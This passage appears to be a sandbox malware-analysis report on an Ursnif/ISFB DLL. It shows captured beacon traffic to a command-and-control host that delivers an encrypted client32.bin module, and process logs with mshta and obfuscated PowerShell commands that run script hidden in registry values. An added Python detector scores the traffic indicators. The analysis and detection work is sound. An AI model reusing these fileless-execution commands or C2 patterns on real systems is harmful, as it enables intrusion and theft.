                           2021-12-14 09:34:08 UTC | 1891 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                           Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49806 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\regsvr32.exe
                           Timestamp | kBytes transferred | Direction | Data
                           2021-12-14 09:34:08 UTC | 1890 | OUT | GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                           2021-12-14 09:34:08 UTC | 1893 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=epkmjqjhsvjopqqq17rp3d0rs6; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                           2021-12-14 09:34:08 UTC | 1893 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~
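Both sessions above are the same kind of check-in: a long path of random-looking segments whose `_2B`/`_2F` sequences are the ISFB/Ursnif habit of percent-encoding a base64 blob and writing `_` in place of `%`, a User-Agent that pairs an MSIE 8.0 token with Windows NT 10.0, and a response labelled `application/zip` with `filename=client32.bin` whose first bytes are not a zip signature. The Python below is an added example, not part of the sandbox report or of Joe Sandbox: it rebuilds the request, the response headers and the first 16 body bytes of session 8 as constructed input and scores them with those heuristics. The segment-count and path-length thresholds are this example's own choices, not values the report states.

```python
import re

# Constructed sample traffic, rebuilt from the report's session 8: request line and
# headers, response headers, and the first 16 bytes of the response body dump.
SAMPLE_PATH = (
    "/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/"
    "QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/"
    "XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/"
    "2Wzq8vdJF/5Vrog3ES/Q.eta"
)
SAMPLE_REQUEST = (
    f"GET {SAMPLE_PATH} HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: berukoneru.website\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.20.1\r\n"
    "Content-Type: application/zip\r\n"
    "Content-Length: 1869\r\n"
    "Connection: close\r\n"
    "Content-Transfer-Encoding: Binary\r\n"
    "Content-Disposition: attachment; filename=client32.bin\r\n\r\n"
)
SAMPLE_BODY = bytes.fromhex("a1e84e39d8b211ec16ab59673aebbe41")  # first 16 bytes of the dump
# Constructed benign request used as the negative case.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n"
    "Host: www.example.com\r\n\r\n"
)

BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_http(message):
    """Split an HTTP message into (start line, {lower-cased header name: value})."""
    head = message.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def recover_path_blob(path):
    """Undo the ISFB path mangling: drop the leading directory and the file
    extension, remove the slashes inserted into the blob, and turn the '_XX'
    escapes (percent-encoding written with '_' instead of '%') back into the
    base64 symbols they stand for ('+', '/', '=')."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < 2:
        return ""
    last = segments[-1].rsplit(".", 1)[0]       # "Q.eta" -> "Q"
    joined = "".join(segments[1:-1]) + last     # segments[0] is the fixed directory
    return re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), joined)


def score_isfb(request, response=None, body=b""):
    """Return the ISFB-style indicators found in one request/response pair.
    The thresholds (6 segments, 150 chars) are this example's own choices."""
    findings = []
    start, req_headers = parse_http(request)
    parts = start.split()
    path = parts[1] if len(parts) >= 2 else ""
    segments = [s for s in path.split("/") if s]
    blob = recover_path_blob(path)

    if re.search(r"_2[BF]", path):
        findings.append("path carries '_2B'/'_2F' escapes for base64 '+' and '/'")
    if len(segments) >= 6 and len(path) > 150 and blob and BASE64_RE.fullmatch(blob):
        findings.append(f"{len(segments)} segments re-join into a {len(blob)}-char base64 blob")
    ua = req_headers.get("user-agent", "")
    if "MSIE" in ua and "Windows NT 10.0" in ua:
        findings.append("User-Agent pairs an MSIE token with Windows NT 10.0 (IE 11 dropped that token)")

    if response is not None:
        _, resp_headers = parse_http(response)
        if resp_headers.get("content-type") == "application/zip" and body and not body.startswith(b"PK\x03\x04"):
            findings.append("Content-Type is application/zip but the body lacks the PK signature")
        if re.search(r"filename=client(32|64)\.bin", resp_headers.get("content-disposition", "")):
            findings.append("Content-Disposition delivers client32/client64.bin, the ISFB module file names")
    return findings


if __name__ == "__main__":
    for hit in score_isfb(SAMPLE_REQUEST, SAMPLE_RESPONSE, SAMPLE_BODY):
        print("-", hit)
    print("benign:", score_isfb(BENIGN_REQUEST))
```

The recovered blob is still Serpent-encrypted beacon data, so the example stops at showing that the path decodes to a clean base64 alphabet once the slashes and `_XX` escapes are removed; the response body likewise is not a zip but an encrypted module, which is why the magic-byte check fires.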


                          Code Manipulations

                          Statistics

                          CPU Usage


                          Memory Usage


                          High Level Behavior Distribution


                          Behavior


                          System Behavior

                          General

                          Start time:10:33:06
                          Start date:14/12/2021
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\6.dll"
                          Imagebase:0x10c0000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:10:33:06
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                          Imagebase:0x150000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\6.dll
                          Imagebase:0xdd0000
                          File size:20992 bytes
                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\6.dll",#1
                          Imagebase:0x11a0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:10:33:07
                          Start date:14/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
                          Imagebase:0x11a0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:10:33:35
                          Start date:14/12/2021
                          Path:C:\Windows\System32\BackgroundTransferHost.exe
                          Wow64 process (32bit):false
                          Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                          Imagebase:0x7ff64e5e0000
                          File size:36864 bytes
                          MD5 hash:02BA81746B929ECC9DB6665589B68335
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:10:34:12
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:10:34:15
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:16
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:20
                          Start date:14/12/2021
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7f2bc0000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:23
                          Start date:14/12/2021
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                          Imagebase:0x7ff617cb0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:23
                          Start date:14/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:26
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:32
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:33
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:35
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:35
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:36
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
                          Imagebase:0x7ff62ec30000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                          Imagebase:0x7ff768110000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:10:34:37
                          Start date:14/12/2021
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff65b0e0000
